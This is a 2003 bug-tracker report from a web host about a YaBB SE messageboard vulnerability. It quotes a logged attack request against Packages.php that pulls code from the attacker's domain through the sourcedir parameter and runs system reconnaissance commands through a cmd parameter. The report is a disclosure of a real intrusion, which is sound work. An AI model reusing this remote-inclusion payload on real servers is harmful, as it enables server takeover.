#12 BIG BUG in packages.php

closed-rejected
nobody
9
2003-02-01
2003-01-31
RGIS
No

A hacker was able to install a rootkit on our server
through a YaBB messageboard:

He used the following string to start taking control:

/yabbse/Sources/Packages.php?
sourcedir=http://www.domain
ofthehacker.com&cmd=cat%20/etc/*-rel*;uname%20-
a;id;w;ls%20-la%20/usr/bin/sudo HTTP/1.1" 200 595

We find it, as fellow php developers, quite strange that
you do not check the variables and strip them from
illegal characters like ";", ":", "%", "@".

Please change this and notify us when you did. With
stripping the illegal characters, the above would not have
had any result. And we would not have hunderds of
euros damage.

To all Linux webhosters: please check your servers for a
YaBB messageboard and make sure it is safe to keep
it, and hackers can not abuse it to gain control over your
server.

Webmanager
RGIS
info@rgis.nl

Discussion

  • RGIS
    RGIS
    2003-01-31

    • priority: 5 --> 9
     
  • Corey Chapman
    Corey Chapman
    2003-02-01

    • status: open --> closed-rejected